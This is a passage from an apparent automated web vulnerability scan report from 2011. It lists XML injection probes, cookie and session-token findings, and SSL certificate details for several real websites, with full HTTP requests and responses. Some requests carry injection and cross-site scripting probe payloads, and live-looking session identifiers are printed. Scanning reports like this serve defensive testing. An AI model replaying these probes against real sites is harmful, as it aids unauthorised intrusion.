The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/health]]>>/favicon.ico HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; last_referrer=; __utmz=168930850.1305489674.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=168930850.799214937.1305489674.1305489674.1305489674.1; __utmc=168930850; __utmb=168930850.1.10.1305489674; __qca=P0-481111707-1305489677084; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:11:59 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=images; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:11:59 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:26:59 GMT;path=/
Content-Length: 20291

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.90. http://www.righthealth.com/images/health/favicon.ico [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.righthealth.com
Path:   /images/health/favicon.ico

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/health/favicon.ico]]>> HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; last_referrer=; __utmz=168930850.1305489674.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=168930850.799214937.1305489674.1305489674.1305489674.1; __utmc=168930850; __utmb=168930850.1.10.1305489674; __qca=P0-481111707-1305489677084; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:12:28 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=images; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:12:28 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:27:28 GMT;path=/
Content-Length: 20281

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.91. http://www.righthealth.com/javascripts/cache/options_bottom-righthealth-sem-chimborazo-153574.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.righthealth.com
Path:   /javascripts/cache/options_bottom-righthealth-sem-chimborazo-153574.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascripts]]>>/cache/options_bottom-righthealth-sem-chimborazo-153574.js?1305315777 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:23 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=javascripts%5D%5D%3E%3E; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:23 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:22:23 GMT;path=/
Content-Length: 20517

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.92. http://www.righthealth.com/javascripts/cache/topic_bottom-righthealth-sem-chimborazo-153574.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.righthealth.com
Path:   /javascripts/cache/topic_bottom-righthealth-sem-chimborazo-153574.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascripts]]>>/cache/topic_bottom-righthealth-sem-chimborazo-153574.js?1305315777 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:08:24 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=javascripts%5D%5D%3E%3E; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:08:24 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:23:24 GMT;path=/
Content-Length: 20725

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.93. http://www.righthealth.com/javascripts/cache/topic_bottom_homepage-righthealth-sem-chimborazo-153574.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.righthealth.com
Path:   /javascripts/cache/topic_bottom_homepage-righthealth-sem-chimborazo-153574.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascripts]]>>/cache/topic_bottom_homepage-righthealth-sem-chimborazo-153574.js?1305315846 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:00 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=javascripts%5D%5D%3E%3E; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:00 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:22:00 GMT;path=/
Content-Length: 20538

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.94. http://www.righthealth.com/javascripts/cache/topic_top-s_righthealth-chimborazo-153574.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.righthealth.com
Path:   /javascripts/cache/topic_top-s_righthealth-chimborazo-153574.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascripts]]>>/cache/topic_top-s_righthealth-chimborazo-153574.js?1305315776 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:02 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=javascripts%5D%5D%3E%3E; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:02 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:22:02 GMT;path=/
Content-Length: 20496

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

9. SSL cookie without secure flag set  previous  next
There are 4 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


9.1. https://console.iserve.net.nz/webmail/src/login.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://console.iserve.net.nz
Path:   /webmail/src/login.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webmail/src/login.php HTTP/1.1
Host: console.iserve.net.nz
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HMC=o26lr6438snpg5gnvbt345p6p4

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 17:26:28 GMT
Server: Apache
Set-Cookie: SQMSESSID=lhinv4vn27moe5rrjla8h7a6a7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SQMSESSID=lhinv4vn27moe5rrjla8h7a6a7; secure; HttpOnly
Set-Cookie: SQMSESSID=rgcameo6b3i9f7cq6ncfnjpmc2; path=/webmail/
Set-Cookie: SQMSESSID=rgcameo6b3i9f7cq6ncfnjpmc2; path=/webmail/; secure; HttpOnly
Content-Length: 2549
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>
<meta name="robots" content="noindex,nofollow">
<link rel="stylesheet" type="text/css" href="none">
<title>WebMail - Log
...[SNIP]...

9.2. https://console.iservices.net.nz/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://console.iservices.net.nz
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: console.iservices.net.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 15 May 2011 17:33:28 GMT
Server: Apache
X-Powered-By: PHP/5.3.0
Set-Cookie: ISERVICES_SESSID=a9agNSGwK4OtskHsxPBzoteywVW5xym; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Content-Type" cont
...[SNIP]...

9.3. https://mail.orcon.net.nz/portal/login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mail.orcon.net.nz
Path:   /portal/login.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/login.php HTTP/1.1
Host: mail.orcon.net.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 17:35:51 GMT
Server: Apache/1.3.34 Ben-SSL/1.55 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: orcon_webmail=deleted; expires=Sat, 15 May 2010 17:35:50 GMT
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 323

       <body onload="document.form.submit();">
           <form name="form" action="./index.php" method="post">
               <input type="hidden" name="_error" value="Incorrect username or password">
               <input type=
...[SNIP]...

9.4. https://secure.tagged.com/secure_login.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.tagged.com
Path:   /secure_login.html

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /secure_login.html?username=&password=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000043%29%3C%2Fscript%3E&token=88db48c3004723571667ba30eebca51e&perslogin=Y HTTP/1.1
Host: secure.tagged.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.tagged.com/secure_login.html?ver=2&loc=en_US&uri=http%3A%2F%2Fwww.tagged.com&display=full&3b883%22%3E%3Cscript%3Ealert(%22INSECURE%22)%3C/script%3E868fc1f78e0=1

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:51:11 GMT
Server: Apache
Set-Cookie: S=eukphp97h1sm400vgrjmip7qj6; path=/; domain=tagged.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 4061

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<link rel="stylesheet" type="text/css" href="https://secure-static.tagged.com/dyn/css/3/_2
...[SNIP]...

10. Session token in URL  previous  next
There are 3 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


10.1. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /bh/set.aspx?action=add&advid=2532&token=AMQU1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
CW-Server: cw-web80
Set-Cookie: V=tRT1MopEi6hc; Domain=.contextweb.com; Expires=Wed, 09-May-2012 18:35:35 GMT; Path=/
Set-Cookie: cwbh1=2532%3B06%2F14%2F2011%3BAMQU1; Domain=.contextweb.com; Expires=Mon, 18-Apr-2016 18:35:35 GMT; Path=/
Content-Type: image/gif
Date: Sun, 15 May 2011 18:35:34 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

10.2. https://secure.tagged.com/secure_login.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.tagged.com
Path:   /secure_login.html

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /secure_login.html?username=&password=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000043%29%3C%2Fscript%3E&token=88db48c3004723571667ba30eebca51e&perslogin=Y HTTP/1.1
Host: secure.tagged.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.tagged.com/secure_login.html?ver=2&loc=en_US&uri=http%3A%2F%2Fwww.tagged.com&display=full&3b883%22%3E%3Cscript%3Ealert(%22INSECURE%22)%3C/script%3E868fc1f78e0=1

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:51:11 GMT
Server: Apache
Set-Cookie: S=eukphp97h1sm400vgrjmip7qj6; path=/; domain=tagged.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 4061

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<link rel="stylesheet" type="text/css" href="https://secure-static.tagged.com/dyn/css/3/_2
...[SNIP]...

10.3. http://www.tagged.com/api/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.tagged.com
Path:   /api/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

POST /api/?application_id=user&format=json&session_token=k48nnbumc29k7tunhd4mautaa0 HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/forgot_password.html
Origin: http://www.tagged.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=k48nnbumc29k7tunhd4mautaa0; __qca=P0-1020015937-1305484533946; __utmz=50703532.1305484534.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50703532.202314569.1305484534.1305484534.1305484534.1; __utmb=50703532.0.10.1305484534; __utmc=50703532
Content-Length: 299


method=tagged.header.renderAlerts&callback=tagged.header.alerts.show&api_signature=&track=pkXrwJtpd9
method=tagged.util.echoIt&data=&callback=tagged.header.alerts.init&api_signature=&track=pkXrwJtpd9
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:36:10 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 219

["{\"stat\":\"ok\",\"diagnostics\":\"0 2.3 25.67\",\"result\":{\"HTML\":\"\"}}","{\"stat\":\"ok\",\"diagnostics\":\"0 2.3 25.67\",\"result\":\"\"}","{\"stat\":\"ok\",\"diagnostics\":\"0 2.3 25.67\",\"
...[SNIP]...

11. SSL certificate  previous  next
There are 10 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



11.1. https://clicktale.pantherssl.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://clicktale.pantherssl.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  *.pantherssl.com
Issued by:  DigiCert High Assurance CA-3
Valid from:  Wed Oct 27 19:00:00 CDT 2010
Valid to:  Tue Dec 11 17:59:59 CST 2012

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 19:00:00 CDT 2007
Valid to:  Sat Apr 02 19:00:00 CDT 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sun Oct 01 00:00:00 CDT 2006
Valid to:  Sat Jul 26 13:15:15 CDT 2014

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 11:09:40 CDT 1999
Valid to:  Sat May 25 11:39:40 CDT 2019

11.2. https://d2s.iserve.net.nz:8443/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://d2s.iserve.net.nz:8443
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificate:

Issued to:  d2s.iserve.net.nz
Issued by:  d2s.iserve.net.nz
Valid from:  Thu Nov 24 14:35:56 CST 2005
Valid to:  Sun Nov 22 14:35:56 CST 2015

11.3. https://console.iserve.net.nz/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://console.iserve.net.nz
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  console.iserve.net.nz
Issued by:  UTN-USERFirst-Hardware
Valid from:  Wed Mar 02 18:00:00 CST 2011
Valid to:  Fri Mar 02 17:59:59 CST 2012

Certificate chain #1

Issued to:  UTN-USERFirst-Hardware
Issued by:  UTN-USERFirst-Hardware
Valid from:  Fri Jul 09 13:10:42 CDT 1999
Valid to:  Tue Jul 09 13:19:22 CDT 2019

Certificate chain #2

Issued to:  UTN-USERFirst-Hardware
Issued by:  UTN-USERFirst-Hardware
Valid from:  Fri Jul 09 13:10:42 CDT 1999
Valid to:  Tue Jul 09 13:19:22 CDT 2019

11.4. https://console.iservices.net.nz/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://console.iservices.net.nz
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  console.iservices.net.nz
Issued by:  UTN-USERFirst-Hardware
Valid from:  Sun Aug 01 19:00:00 CDT 2010
Valid to:  Thu Sep 22 18:59:59 CDT 2011

Certificate chain #1

Issued to:  UTN-USERFirst-Hardware
Issued by:  AddTrust External CA Root
Valid from:  Tue Jun 07 03:09:10 CDT 2005
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

11.5. https://idm.net.nz/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://idm.net.nz
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  idm.net.nz
Issued by:  COMODO High-Assurance Secure Server CA
Valid from:  Mon May 09 19:00:00 CDT 2011
Valid to:  Wed May 09 18:59:59 CDT 2012

Certificate chain #1

Issued to:  COMODO High-Assurance Secure Server CA
Issued by:  AddTrust External CA Root
Valid from:  Thu Apr 15 19:00:00 CDT 2010
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

11.6. https://mail.orcon.net.nz/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mail.orcon.net.nz
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  mail.orcon.net.nz
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Tue Apr 19 18:13:09 CDT 2011
Valid to:  Wed May 09 22:11:21 CDT 2012

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  http://www.valicert.com/
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Sat Jun 29 12:06:20 CDT 2024

Certificate chain #3

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019

Certificate chain #4

